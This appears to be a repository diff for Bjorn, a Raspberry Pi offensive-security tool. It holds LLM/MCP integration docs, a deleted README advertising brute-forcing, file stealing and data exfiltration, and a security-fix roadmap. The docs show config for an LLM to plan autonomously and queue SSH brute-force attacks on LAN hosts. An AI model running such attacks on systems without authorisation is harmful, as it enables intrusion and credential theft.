- HTTP port
- Per-tool checkboxes
- "RUNNING" / "OFF" indicator
**Access:** `http://[bjorn-ip]:8000/mcp-config.html`
---
## 12. Startup (`Bjorn.py`)
```python
# LLM Bridge — warm up singleton
try:
from llm_bridge import LLMBridge
LLMBridge() # Starts mDNS discovery if llm_laruche_discovery=True
logger.info("LLM Bridge initialised")
except Exception as e:
logger.warning("LLM Bridge init skipped: %s", e)
# MCP Server
try:
import mcp_server
if shared_data.config.get("mcp_enabled", False):
mcp_server.start() # Daemon thread "MCPServer"
logger.info("MCP server started")
else:
logger.info("MCP server loaded (disabled)")
except Exception as e:
logger.warning("MCP server init skipped: %s", e)
```
The LLM Orchestrator is initialised inside `orchestrator.py` (not `Bjorn.py`), since it depends on the orchestrator loop cycle.
---
## 13. LaRuche / LAND Protocol compatibility
### LAND Protocol
LAND (Local AI Network Discovery) is the LaRuche protocol:
- **Discovery:** mDNS service type `_ai-inference._tcp.local.`
- **Inference:** `POST http://[node]:8419/infer`
### What Bjorn implements on the Python side
```python
# mDNS listening (zeroconf)
from zeroconf import Zeroconf, ServiceBrowser
ServiceBrowser(zc, "_ai-inference._tcp.local.", listener)
# → Auto-detects LaRuche nodes
# Inference call (urllib stdlib, zero dependency)
payload = {"prompt": "...", "capability": "llm", "max_tokens": 500}
urllib.request.urlopen(f"{url}/infer", data=json.dumps(payload))
```
### Scenarios
| Scenario | Behaviour |
|----------|-----------|
| LaRuche node detected on LAN | Used automatically as priority backend |
| Multiple LaRuche nodes | First discovered is used |
| Manual URL configured | Used directly, discovery ignored |
| LaRuche node absent | Cascades to Ollama or external API |
| `zeroconf` not installed | Discovery silently disabled, DEBUG log |
---
## 14. Optional dependencies
| Package | Min version | Feature unlocked | Install command |
|---------|------------|------------------|----------------|
| `mcp[cli]` | ≥ 1.0.0 | Full MCP server | `pip install "mcp[cli]"` |
| `zeroconf` | ≥ 0.131.0 | LaRuche mDNS discovery | `pip install zeroconf` |
**No new dependencies** added for LLM backends:
- **LaRuche / Ollama**: uses `urllib.request` (Python stdlib)
- **Anthropic / OpenAI**: REST API via `urllib` — no SDK needed
---
## 15. Quick activation & configuration
### Basic LLM chat
```bash
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
-H "Content-Type: application/json" \
-d '{"llm_enabled": true, "llm_backend": "ollama", "llm_ollama_model": "phi3:mini"}'
# → http://[bjorn-ip]:8000/chat.html
```
### Chat with tool-calling (LLM accesses live network data)
```bash
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
-d '{"llm_enabled": true, "llm_chat_tools_enabled": true}'
```
### LLM Orchestrator — advisor mode
```bash
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
-d '{
"llm_enabled": true,
"llm_orchestrator_mode": "advisor",
"llm_orchestrator_allowed_actions": ["NmapScan", "SSHBruteforce"]
}'
```
### LLM Orchestrator — autonomous mode (LLM as sole planner)
```bash
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
-d '{
"llm_enabled": true,
"llm_orchestrator_mode": "autonomous",
"llm_orchestrator_skip_scheduler": true,
"llm_orchestrator_max_actions": 5,
"llm_orchestrator_interval_s": 120,
"llm_orchestrator_allowed_actions": ["NmapScan", "SSHBruteforce", "SMBScan"],
"llm_orchestrator_log_reasoning": true
}'
# → View reasoning: http://[bjorn-ip]:8000/chat.html → Orch Log button
```
### With Anthropic API
```bash
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
-d '{
"llm_enabled": true,
"llm_backend": "api",
"llm_api_provider": "anthropic",
"llm_api_key": "sk-ant-...",
"llm_api_model": "claude-haiku-4-5-20251001"
}'
```
### With OpenRouter (access to all models)
```bash
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
-d '{
"llm_enabled": true,
"llm_backend": "api",
"llm_api_provider": "openrouter",
"llm_api_key": "sk-or-...",
"llm_api_model": "meta-llama/llama-3.2-3b-instruct",
"llm_api_base_url": "https://openrouter.ai/api"
}'
```
### Model recommendations by scenario
| Scenario | Backend | Recommended model | Pi RAM |
|----------|---------|-------------------|--------|
| Autonomous orchestrator + LaRuche on LAN | laruche | Mistral/Phi on the node | 0 (remote inference) |
| Autonomous orchestrator offline | ollama | `qwen2.5:3b` | ~3 GB |
| Autonomous orchestrator cloud | api | `claude-haiku-4-5-20251001` | 0 |
| Chat + tools | ollama | `phi3:mini` | ~2 GB |
| EPD comments only | ollama | `smollm2:360m` | ~400 MB |
---
## 16. Complete API endpoint reference
### GET
```
GET /api/llm/status
→ {"enabled": bool, "backend": str, "laruche_url": str|null,
"laruche_discovery": bool, "ollama_url": str, "ollama_model": str,
"api_provider": str, "api_model": str, "api_key_set": bool}
GET /api/llm/config
→ {all llm_* keys except api_key, + "llm_api_key_set": bool}
GET /api/llm/reasoning
→ {"status": "ok", "messages": [{"role": str, "content": str}, ...], "count": int}
→ {"status": "error", "message": str, "messages": [], "count": 0}
GET /api/mcp/status
→ {"enabled": bool, "running": bool, "transport": str,
"port": int, "allowed_tools": [str]}
```
### POST
```
POST /api/llm/chat
Body: {"message": str, "session_id": str?}
→ {"status": "ok", "response": str, "session_id": str}
→ {"status": "error", "message": str}
POST /api/llm/clear_history
Body: {"session_id": str?}
→ {"status": "ok"}
POST /api/llm/config
Body: {any subset of llm_* and llm_orchestrator_* keys}
→ {"status": "ok"}
→ {"status": "error", "message": str}
POST /api/mcp/toggle
Body: {"enabled": bool}
→ {"status": "ok", "enabled": bool, "started": bool?}
POST /api/mcp/config
Body: {"allowed_tools": [str]?, "port": int?, "transport": str?}
→ {"status": "ok", "config": {...}}
```
---
## 17. Queue priority system
```
Priority Source Trigger
──────────────────────────────────────────────────────────────
85 LLM Advisor llm_orchestrator.advise()
82 LLM Autonomous _run_autonomous_cycle() via run_action tool
80 External MCP _impl_run_action() via MCP client or chat
50 Normal / manual queue_action() without explicit priority
40 Scheduler action_scheduler evaluates triggers
```
The scheduler always processes the highest-priority pending item first. LLM and MCP actions therefore preempt scheduler actions.
---
## 18. Fallbacks & graceful degradation
| Condition | Behaviour |
|-----------|-----------|
| `llm_enabled = False` | `complete()` returns `None` immediately — zero overhead |
| `llm_orchestrator_mode = "none"` | LLMOrchestrator not instantiated |
| `mcp` not installed | `_build_mcp_server()` returns `None`, WARNING log |
| `zeroconf` not installed | LaRuche discovery silently disabled, DEBUG log |
| LaRuche node timeout | Exception caught, cascade to next backend |
| Ollama not running | `URLError` caught, cascade to API |
| API key missing | `_call_api()` returns `None`, cascade |
| All backends fail | `complete()` returns `None` |
| LLM returns `None` for EPD | `comment.py` uses `_pick_text()` (original behaviour) |
| LLM advisor: invalid JSON | DEBUG log, returns `None`, next cycle |
| LLM advisor: disallowed action | WARNING log, ignored |
| LLM autonomous: no change | cycle skipped, zero API call |
| LLM autonomous: ≥6 tool turns | returns partial text + warning |
| Exception in LLM Bridge | `try/except` at every level, DEBUG log |
### Timeouts
```
Chat / complete() → llm_timeout_s (default: 30s)
EPD comments → 8s (hardcoded, short to avoid blocking render)
Autonomous cycle → 90s (long: may chain multiple tool calls)
Advisor → 20s (short prompt + JSON response)
```
---
## 19. Call sequences
### Web chat with tool-calling
```
Browser → POST /api/llm/chat {"message": "which hosts are vulnerable?"}
└── LLMUtils.handle_chat(data)
└── LLMBridge().chat(message, session_id)
└── complete(messages, system, tools=_BJORN_TOOLS)
└── _call_anthropic(messages, tools=[...])
├── POST /v1/messages → stop_reason=tool_use
│ └── tool: get_hosts(alive_only=true)
│ → _execute_tool → _impl_get_hosts()
│ → JSON of hosts
├── POST /v1/messages [+ tool result] → end_turn
└── returns "3 exposed SSH hosts: 192.168.1.10, ..."
← {"status": "ok", "response": "3 exposed SSH hosts..."}
```
### LLM autonomous cycle
```
Thread "LLMOrchestrator" (daemon, interval=60s)
└── _run_autonomous_cycle()
├── fp = _compute_fingerprint() → (12, 3, 1, 47)
├── _has_actionable_change(fp) → True (vuln_count 2→3)
├── self._last_fingerprint = fp
└── LLMBridge().complete(prompt, system, tools=[read-only + run_action])
└── _call_anthropic(tools=[...])
├── POST → tool_use: get_hosts()
│ → [{ip: "192.168.1.20", ports: "22,80,443"}]
├── POST → tool_use: get_action_history()
│ → [...]
├── POST → tool_use: run_action("SSHBruteforce", "192.168.1.20")
│ → _execute_tool → _impl_run_action()
│ → db.queue_action(priority=82, trigger="llm_autonomous")
│ → queue_event.set()
└── POST → end_turn
→ "Queued SSHBruteforce on 192.168.1.20 (Mjolnir strikes the unguarded gate)"
→ [if log_reasoning=True] logger.info("[LLM_ORCH_REASONING]...")
→ [if log_reasoning=True] _push_to_chat(bridge, prompt, response)
```
### Reading reasoning from chat.html
```
User clicks "Orch Log"
└── fetch GET /api/llm/reasoning
└── LLMUtils.get_llm_reasoning(handler)
└── LLMBridge()._chat_histories["llm_orchestrator"]
→ [{"role": "user", "content": "[Autonomous cycle]..."},
{"role": "assistant", "content": "Queued SSHBruteforce..."}]
← {"status": "ok", "messages": [...], "count": 2}
→ Rendered as chat bubbles in #messages
```
### MCP from external client (Claude Desktop)
```
Claude Desktop → tool_call: run_action("NmapScan", "192.168.1.0/24")
└── FastMCP dispatch
└── mcp_server.run_action(action_name, target_ip)
└── _impl_run_action()
├── db.queue_action(priority=80, trigger="mcp")
└── queue_event.set()
← {"status": "queued", "action": "NmapScan", "target": "192.168.1.0/24", "priority": 80}
```
### EPD comment with LLM
```
display.py → CommentAI.get_comment("SSHBruteforce", params={...})
└── delay elapsed OR status changed → proceed
├── llm_comments_enabled = True ?
│ └── LLMBridge().generate_comment("SSHBruteforce", params)
│ └── complete([{role:user, content:"Status: SSHBruteforce..."}],
│ max_tokens=80, timeout=8)
│ ├── LaRuche → "Norse gods smell SSH credentials..." ✓
│ └── [or timeout 8s] → None
└── text = None → _pick_text("SSHBruteforce", lang, params)
└── SELECT FROM comments WHERE status='SSHBruteforce'
→ "Processing authentication attempts..."
```

179
README.md
View File

@@ -1,179 +0,0 @@
# <img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="33"> Bjorn
![Python](https://img.shields.io/badge/Python-3776AB?logo=python&logoColor=fff)
![Status](https://img.shields.io/badge/Status-Development-blue.svg)
[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
[![Reddit](https://img.shields.io/badge/Reddit-Bjorn__CyberViking-orange?style=for-the-badge&logo=reddit)](https://www.reddit.com/r/Bjorn_CyberViking)
[![Discord](https://img.shields.io/badge/Discord-Join%20Us-7289DA?style=for-the-badge&logo=discord)](https://discord.com/invite/B3ZH9taVfT)
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="150">
<img src="https://github.com/user-attachments/assets/1b490f07-f28e-4418-8d41-14f1492890c6" alt="bjorn_epd-removebg-preview" width="150">
</p>
Bjorn is a « Tamagotchi like » sophisticated, autonomous network scanning, vulnerability assessment, and offensive security tool designed to run on a Raspberry Pi equipped with a 2.13-inch e-Paper HAT. This document provides a detailed explanation of the project.
## 📚 Table of Contents
- [Introduction](#-introduction)
- [Features](#-features)
- [Getting Started](#-getting-started)
- [Prerequisites](#-prerequisites)
- [Installation](#-installation)
- [Quick Start](#-quick-start)
- [Usage Example](#-usage-example)
- [Contributing](#-contributing)
- [License](#-license)
- [Contact](#-contact)
## 📄 Introduction
Bjorn is a powerful tool designed to perform comprehensive network scanning, vulnerability assessment, and data ex-filtration. Its modular design and extensive configuration options allow for flexible and targeted operations. By combining different actions and orchestrating them intelligently, Bjorn can provide valuable insights into network security and help identify and mitigate potential risks.
The e-Paper HAT display and web interface make it easy to monitor and interact with Bjorn, providing real-time updates and status information. With its extensible architecture and customizable actions, Bjorn can be adapted to suit a wide range of security testing and monitoring needs.
## 🌟 Features
- **Network Scanning**: Identifies live hosts and open ports on the network.
- **Vulnerability Assessment**: Performs vulnerability scans using Nmap and other tools.
- **System Attacks**: Conducts brute-force attacks on various services (FTP, SSH, SMB, RDP, Telnet, SQL).
- **File Stealing**: Extracts data from vulnerable services.
- **User Interface**: Real-time display on the e-Paper HAT and web interface for monitoring and interaction.
[![Architecture](https://img.shields.io/badge/ARCHITECTURE-Read_Docs-ff69b4?style=for-the-badge&logo=github)](./ARCHITECTURE.md)
![Bjorn Display](https://github.com/infinition/Bjorn/assets/37984399/bcad830d-77d6-4f3e-833d-473eadd33921)
## 🚀 Getting Started
## 📌 Prerequisites
### 📋 Prerequisites for RPI zero W (32bits)
![image](https://github.com/user-attachments/assets/3980ec5f-a8fc-4848-ab25-4356e0529639)
- Raspberry Pi OS installed.
- Stable:
- System: 32-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-armhf-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
### 📋 Prerequisites for RPI zero W2 (64bits)
![image](https://github.com/user-attachments/assets/e8d276be-4cb2-474d-a74d-b5b6704d22f5)
I did not develop Bjorn for the raspberry pi zero w2 64bits, but several feedbacks have attested that the installation worked perfectly.
- Raspberry Pi OS installed.
- Stable:
- System: 64-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-arm64-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
At the moment the paper screen v2 v4 have been tested and implemented.
I juste hope the V1 & V3 will work the same.
### 🔨 Installation
The fastest way to install Bjorn is using the automatic installation script :
```bash
# Download and run the installer
wget https://raw.githubusercontent.com/infinition/Bjorn/refs/heads/main/install_bjorn.sh
sudo chmod +x install_bjorn.sh && sudo ./install_bjorn.sh
# Choose the choice 1 for automatic installation. It may take a while as a lot of packages and modules will be installed. You must reboot at the end.
```
For **detailed information** about **installation** process go to [Install Guide](INSTALL.md)
## ⚡ Quick Start
**Need help ? You struggle to find Bjorn's IP after the installation ?**
Use my Bjorn Detector & SSH Launcher :
[https://github.com/infinition/bjorn-detector](https://github.com/infinition/bjorn-detector)
![ezgif-1-a310f5fe8f](https://github.com/user-attachments/assets/182f82f0-5c3a-48a9-a75e-37b9cfa2263a)
**Hmm, You still need help ?**
For **detailed information** about **troubleshooting** go to [Troubleshooting](TROUBLESHOOTING.md)
**Quick Installation**: you can use the fastest way to install **Bjorn** [Getting Started](#-getting-started)
## 💡 Usage Example
Here's a demonstration of how Bjorn autonomously hunts through your network like a Viking raider (fake demo for illustration):
```bash
# Reconnaissance Phase
[NetworkScanner] Discovering alive hosts...
[+] Host found: 192.168.1.100
├── Ports: 22,80,445,3306
└── MAC: 00:11:22:33:44:55
# Attack Sequence
[NmapVulnScanner] Found vulnerabilities on 192.168.1.100
├── MySQL 5.5 < 5.7 - User Enumeration
└── SMB - EternalBlue Candidate
[SSHBruteforce] Cracking credentials...
[+] Success! user:password123
[StealFilesSSH] Extracting sensitive data...
# Automated Data Exfiltration
[SQLBruteforce] Database accessed!
[StealDataSQL] Dumping tables...
[SMBBruteforce] Share accessible
[+] Found config files, credentials, backups...
```
This is just a demo output - actual results will vary based on your network and target configuration.
All discovered data is automatically organized in the data/output/ directory, viewable through both the e-Paper display (as indicators) and web interface.
Bjorn works tirelessly, expanding its network knowledge base and growing stronger with each discovery.
No constant monitoring needed - just deploy and let Bjorn do what it does best: hunt for vulnerabilities.
🔧 Expand Bjorn's Arsenal!
Bjorn is designed to be a community-driven weapon forge. Create and share your own attack modules!
⚠️ **For educational and authorized testing purposes only** ⚠️
## 🤝 Contributing
The project welcomes contributions in:
- New attack modules.
- Bug fixes.
- Documentation.
- Feature improvements.
For **detailed information** about **contributing** process go to [Contributing Docs](CONTRIBUTING.md), [Code Of Conduct](CODE_OF_CONDUCT.md) and [Development Guide](DEVELOPMENT.md).
## 📫 Contact
- **Report Issues**: Via GitHub.
- **Guidelines**:
- Follow ethical guidelines.
- Document reproduction steps.
- Provide logs and context.
- **Author**: __infinition__
- **GitHub**: [infinition/Bjorn](https://github.com/infinition/Bjorn)
## 🌠 Stargazers
[![Star History Chart](https://api.star-history.com/svg?repos=infinition/bjorn&type=Date)](https://star-history.com/#infinition/bjorn&Date)
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

315
ROADMAP.md Normal file
View File

@@ -0,0 +1,315 @@
# BJORN Cyberviking — Roadmap & Changelog
> Comprehensive audit-driven roadmap for the v2 release.
> Each section tracks scope, status, and implementation notes.
---
## Legend
| Tag | Meaning |
|-----|---------|
| `[DONE]` | Implemented and verified |
| `[WIP]` | Work in progress |
| `[TODO]` | Not yet started |
| `[DROPPED]` | Descoped / won't fix |
---
## P0 — Security & Blockers (Must-fix before release)
### SEC-01: Shell injection in system_utils.py `[DONE]`
- **File:** `web_utils/system_utils.py`
- **Issue:** `subprocess.Popen(command, shell=True)` on reboot, shutdown, restart, clear_logs
- **Fix:** Replace all `shell=True` calls with argument lists (`["sudo", "reboot"]`)
- **Risk:** Command injection if any parameter is ever user-controlled
### SEC-02: Path traversal in DELETE route `[DONE]`
- **File:** `webapp.py:497-498`
- **Issue:** MAC address extracted from URL path with no validation — `self.path.split(...)[-1]`
- **Fix:** URL-decode and validate MAC format with regex before passing to handler
### SEC-03: Path traversal in file operations `[DONE]`
- **File:** `web_utils/file_utils.py`
- **Issue:** `move_file`, `rename_file`, `delete_file` accept paths from POST body.
Path validation uses `startswith()` which can be bypassed (symlinks, encoding).
- **Fix:** Use `os.path.realpath()` instead of `os.path.abspath()` for canonicalization.
Add explicit path validation helper used by all file ops.
### SEC-04: Cortex secrets committed to repo `[DONE]`
- **Files:** `bjorn-cortex/Cortex/security_config.json`, `server_config.json`
- **Issue:** JWT secret, TOTP secret, admin password hash, device API key in git
- **Fix:** Replaced with clearly-marked placeholder values + WARNING field, already in `.gitignore`
### SEC-05: Cortex WebSocket without auth `[DONE]`
- **File:** `bjorn-cortex/Cortex/server.py`
- **Issue:** `/ws/logs` endpoint has no authentication — anyone can see training logs
- **Fix:** Added `_verify_ws_token()` — JWT via query param or first message, close 4401 on failure
### SEC-06: Cortex device API auth disabled by default `[DONE]`
- **File:** `bjorn-cortex/Cortex/server_config.json`
- **Issue:** `allow_device_api_without_auth: true` + empty `device_api_key`
- **Fix:** Default to `false`, placeholder API key, CORS origins via `CORS_ORIGINS` env var
---
## P0 — Bluetooth Fixes
### BT-01: Bare except clauses `[DONE]`
- **File:** `web_utils/bluetooth_utils.py:225,258`
- **Issue:** `except:` swallows all exceptions including SystemExit, KeyboardInterrupt
- **Fix:** Replace with `except (dbus.exceptions.DBusException, Exception) as e:` with logging
### BT-02: Null address passed to BT functions `[DONE]`
- **File:** `webapp.py:210-214`
- **Issue:** `d.get('address')` can return None, passed directly to BT methods
- **Fix:** Add null check + early return with error in each lambda/BT method entry point
### BT-03: Race condition on bt.json `[DONE]`
- **File:** `web_utils/bluetooth_utils.py:200-216`
- **Issue:** Read-modify-write on shared file without locking
- **Fix:** Add `threading.Lock` for bt.json access, use atomic write pattern
### BT-04: auto_bt_connect service crash `[DONE]`
- **File:** `web_utils/bluetooth_utils.py:219`
- **Issue:** `subprocess.run(..., check=True)` raises CalledProcessError if service missing
- **Fix:** Use `check=False` and log warning instead of crashing
---
## P0 — Web Server Fixes
### WEB-01: SSE reconnect counter reset bug `[DONE]`
- **File:** `web/js/core/console-sse.js:367`
- **Issue:** `reconnectCount = 0` on every message — a single flaky message resets counter,
enabling infinite reconnect loops
- **Fix:** Only reset counter after sustained healthy connection (e.g., 5+ messages)
### WEB-02: Silent routes list has trailing empty string `[DONE]`
- **File:** `webapp.py:474`
- **Issue:** Empty string `""` in `silent_routes` matches ALL log messages
- **Fix:** Remove empty string from list
---
## P1 — Stability & Consistency
### STAB-01: Uniform error handling pattern `[DONE]`
- **Files:** All `web_utils/*.py`
- **Issue:** Mix of bare `except:`, `except Exception`, inconsistent error response format
- **Fix:** Establish `_json_response(handler, data, status)` helper; catch specific exceptions
### STAB-02: Add pagination to heavy API endpoints `[DONE]`
- **Files:** `web_utils/netkb_utils.py`, `web_utils/orchestrator_utils.py`
- **Endpoints:** `/netkb_data`, `/list_credentials`, `/network_data`
- **Fix:** Accept `?page=N&per_page=M` query params, return `{data, total, page, pages}`
### STAB-03: Dead routes & unmounted pages `[DONE]`
- **Files:** `web/js/app.js`, various
- **Issue:** GPS UI elements with no backend, rl-dashboard not mounted, zombieland incomplete
- **Fix:** Remove GPS placeholder, wire rl-dashboard mount, mark zombieland as beta
### STAB-04: Missing constants for magic numbers `[DONE]`
- **Files:** `web_utils/bluetooth_utils.py`, `webapp.py`
- **Fix:** Extract timeout values, pool sizes, size limits to named constants
---
## P2 — Web SPA Quality
### SPA-01: Review & fix dashboard.js `[DONE]`
- Check stat polling, null safety, error display
### SPA-02: Review & fix network.js `[DONE]`
- D3 graph cleanup on unmount, memory leak check
### SPA-03: Review & fix credentials.js `[DONE]`
- Search/filter robustness, export edge cases
### SPA-04: Review & fix vulnerabilities.js `[DONE]`
- CVE modal error handling, feed sync status
### SPA-05: Review & fix files.js `[DONE]`
- Upload progress, drag-drop edge cases, path validation
### SPA-06: Review & fix netkb.js `[DONE]`
- View mode transitions, filter persistence, pagination integration
### SPA-07: Review & fix web-enum.js `[DONE]`
- Status code filter, date range, export completeness
### SPA-08: Review & fix rl-dashboard.js `[DONE]`
- Canvas cleanup, mount lifecycle, null data handling
### SPA-09: Review & fix zombieland.js (C2) `[DONE]`
- SSE lifecycle, agent list refresh, mark as experimental
### SPA-10: Review & fix scripts.js `[DONE]`
- Output polling cleanup, project upload validation
### SPA-11: Review & fix attacks.js `[DONE]`
- Tab switching, image upload validation
### SPA-12: Review & fix bjorn.js (EPD viewer) `[DONE]`
- Image refresh, zoom controls, null EPD state
### SPA-13: Review & fix settings-config.js `[DONE]`
- Form generation edge cases, chip editor validation
### SPA-14: Review & fix actions-studio.js `[DONE]`
- Canvas lifecycle, node dragging, edge persistence
---
## P2 — AI/Cortex Improvements
### AI-01: Feature selection / importance analysis `[DONE]`
- Variance-based feature filtering in data consolidator (drops near-zero variance features)
- Feature manifest exported alongside training data
- `get_feature_importance()` method on FeatureLogger for introspection
- Config: `ai_feature_selection_min_variance` (default 0.001)
### AI-02: Continuous reward shaping `[DONE]`
- Extended reward function with 4 new components: novelty bonus, repeat penalty,
diminishing returns, partial credit for long-running failed actions
- Helper methods to query attempt counts and consecutive failures from ml_features
### AI-03: Model versioning & rollback `[DONE]`
- Keep up to 3 model versions on disk (configurable)
- Model history tracking: version, loaded_at, accuracy, avg_reward
- `rollback_model()` method to load previous version
- Auto-rollback if average reward drops below previous model after 50 decisions
### AI-04: Low-data cold-start bootstrap `[DONE]`
- Bootstrap scores dict accumulating per (action_name, port_profile) running averages
- Blended heuristic/bootstrap scoring (40-80% weight based on sample count)
- Persistent `ai_bootstrap_scores.json` across restarts
- Config: `ai_cold_start_bootstrap_weight` (default 0.6)
---
## P3 — Future Features
### EPD-01: Multi-size EPD layout engine `[DONE]`
- New `display_layout.py` module with `DisplayLayout` class
- JSON layout definitions per EPD type (2.13", 2.7")
- Element-based positioning: each UI component has named anchor `{x, y, w, h}`
- Custom layouts stored in `resources/layouts/{epd_type}.json`
- `px()`/`py()` scaling preserved, layout provides reference coordinates
- Integrated into `display.py` rendering pipeline
### EPD-02: Web-based EPD layout editor `[DONE]`
- Backend API: `GET/POST /api/epd/layout`, `POST /api/epd/layout/reset`
- `GET /api/epd/layouts` lists all supported EPD types and their layouts
- `GET /api/epd/layout?epd_type=X` to fetch layout for a specific EPD type
- Frontend editor: `web/js/core/epd-editor.js` — 4th tab in attacks page
- SVG canvas with drag-and-drop element positioning and corner resize handles
- Display mode preview: Color, NB (black-on-white), BN (white-on-black)
- Grid/snap, zoom (50-600%), toggleable element labels
- Add/delete elements, import/export layout JSON
- Properties panel with x/y/w/h editors, font size editors
- Undo system (50-deep snapshot stack, Ctrl+Z)
- Color-coded elements by type (icons=blue, text=green, bars=orange, etc.)
- Transparency-aware checkerboard canvas background
- Arrow key nudge, keyboard shortcuts
### ORCH-01: Per-action circuit breaker `[DONE]`
- New `action_circuit_breaker` DB table: failure_streak, circuit_status, cooldown_until
- Three states: closed → open (after N fails) → half_open (after cooldown)
- Exponential backoff: `min(2^streak * 60, 3600)` seconds
- Integrated into `_should_queue_action()` check
- Success on half-open resets circuit, failure re-opens with longer cooldown
- Config: `circuit_breaker_threshold` (default 3)
### ORCH-02: Global concurrency limiter `[DONE]`
- DB-backed running action count check before scheduling
- `count_running_actions()` method in queue.py
- Per-action `max_concurrent` support in requirements evaluator
- Respects `semaphore_slots` config (default 5)
### ORCH-03: Manual mode with active scanning `[DONE]`
- Background scan timer thread in MANUAL mode
- NetworkScanner runs at `manual_mode_scan_interval` (default 180s)
- Config: `manual_mode_auto_scan` (default True)
- Scan timer auto-stops when switching back to AUTO/AI
---
## Changelog
### 2026-03-12 — Security & Stability Audit
#### Security
- **[SEC-01]** Replaced all `shell=True` subprocess calls with safe argument lists
- **[SEC-02]** Added MAC address validation (regex) in DELETE route handler
- **[SEC-03]** Strengthened path validation using `os.path.realpath()` + dedicated helper
- **[BT-01]** Replaced bare `except:` with specific exception handling + logging
- **[BT-02]** Added null address validation in Bluetooth route lambdas and method entry points
- **[BT-03]** Added file lock for bt.json read/write operations
- **[BT-04]** Changed auto_bt_connect restart to non-fatal (check=False)
- **[SEC-04]** Cortex config files: placeholder secrets + WARNING field, already gitignored
- **[SEC-05]** Added JWT auth to Cortex WebSocket `/ws/logs` endpoint
- **[SEC-06]** Cortex device API auth now required by default, CORS configurable via env var
#### Bug Fixes
- **[WEB-01]** Fixed SSE reconnect counter: only resets after 5+ consecutive healthy messages
- **[WEB-02]** Removed empty string from silent_routes that was suppressing all log messages
- **[STAB-03]** Cleaned up dead GPS UI references, wired rl-dashboard mount
- **[ORCH-BUG]** Fixed Auto→Manual mode switch not resetting status to IDLE (4-location fix):
- `orchestrator.py`: Reset all status fields after main loop exit AND after action completes with exit flag
- `Bjorn.py`: Reset status even when `thread.join(10)` times out
- `orchestrator_utils.py`: Explicit IDLE reset in web API stop handler
#### Quality
- **[STAB-01]** Standardized error handling across web_utils modules
- **[STAB-04]** Extracted magic numbers to named constants
#### SPA Page Review (SPA-01..14)
All 18 SPA page modules reviewed and fixed:
**Pages fully rewritten (11 pages):**
- **dashboard.js** — New layout with ResourceTracker, safe DOM (no innerHTML), visibility-aware pollers, proper uptime ticker cleanup
- **network.js** — D3 force graph cleanup on unmount, lazy d3 loading, search debounce tracked, simulation stop
- **credentials.js** — AbortController tracked, toast timer tracked, proper state reset in unmount
- **vulnerabilities.js** — ResourceTracker integration, abort controllers, null safety throughout
- **files.js** — Upload progress, drag-drop safety, ResourceTracker lifecycle
- **netkb.js** — View mode persistence, filter tracked, pagination integration
- **web-enum.js** — Status filter, date range, tracked pollers and timeouts
- **rl-dashboard.js** — Canvas cleanup, chart lifecycle, null data guards
- **zombieland.js** — SSE lifecycle tracked, agent list cleanup, experimental flag
- **attacks.js** — Tab switching, ResourceTracker integration, proper cleanup
- **bjorn.js** — Image refresh tracked, zoom controls, null EPD state handling
**Pages with targeted fixes (7 pages):**
- **bjorn-debug.js** — Fixed 3 button event listeners using raw `addEventListener``tracker.trackEventListener` (memory leak)
- **scheduler.js** — Added `searchDeb` timeout cleanup + state reset in unmount (zombie timer)
- **actions.js** — Added resize debounce cleanup in unmount + tracked `highlightPane` timeout (zombie timer)
- **backup.js** — Already clean: ResourceTracker, sidebar layout cleanup, state reset (no changes needed)
- **database.js** — Already clean: search debounce cleanup, sidebar layout, Poller lifecycle (no changes needed)
- **loot.js** — Already clean: search timer cleanup, ResourceTracker, state reset (no changes needed)
- **actions-studio.js** — Already clean: runtime cleanup function, ResourceTracker (no changes needed)
#### AI Pipeline (AI-01..04)
- **[AI-01]** Feature selection: variance-based filtering in `data_consolidator.py`, feature manifest export, `get_feature_importance()` in `feature_logger.py`
- **[AI-02]** Continuous reward shaping in `orchestrator.py`: novelty bonus, diminishing returns penalty, partial credit for long-running failures, attempt/streak DB queries
- **[AI-03]** Model versioning in `ai_engine.py`: 3-model history, `rollback_model()`, auto-rollback after 50 decisions if avg reward drops
- **[AI-04]** Cold-start bootstrap in `ai_engine.py`: persistent `ai_bootstrap_scores.json`, blended heuristic/bootstrap scoring with adaptive weighting
#### Orchestrator (ORCH-01..03)
- **[ORCH-01]** Circuit breaker: new `action_circuit_breaker` DB table in `db_utils/queue.py`, 3-state machine (closed→open→half-open), exponential backoff `min(2^N*60, 3600)s`, integrated into `action_scheduler.py` scheduling decisions and `orchestrator.py` post-execution
- **[ORCH-02]** Global concurrency limiter: `count_running_actions()` in `db_utils/queue.py`, pre-schedule check in `action_scheduler.py` against `semaphore_slots` config
- **[ORCH-03]** Manual mode scanning: background `_scan_loop` thread in `orchestrator_utils.py`, runs at `manual_mode_scan_interval` (180s default), auto-stops on mode switch
#### EPD Multi-Size (EPD-01..02)
- **[EPD-01]** New `display_layout.py` module: `DisplayLayout` class with JSON-based element positioning, built-in layouts for 2.13" and 2.7" displays, custom layout override via `resources/layouts/`, 20+ elements integrated into `display.py` rendering pipeline
- **[EPD-02]** Backend API: `GET/POST /api/epd/layout`, `POST /api/epd/layout/reset`, `GET /api/epd/layouts` — endpoints in `web_utils/system_utils.py`, routes in `webapp.py`
- **[EPD-02]** Frontend editor: `web/js/core/epd-editor.js` as 4th tab in attacks page — SVG drag-and-drop canvas, resize handles, Color/NB/BN display modes, grid/snap/zoom, add/delete elements, import/export JSON, undo stack, font size editing, arrow key nudge
#### New Configuration Parameters
- `ai_feature_selection_min_variance` (0.001) — minimum variance for feature inclusion
- `ai_model_history_max` (3) — max model versions kept on disk
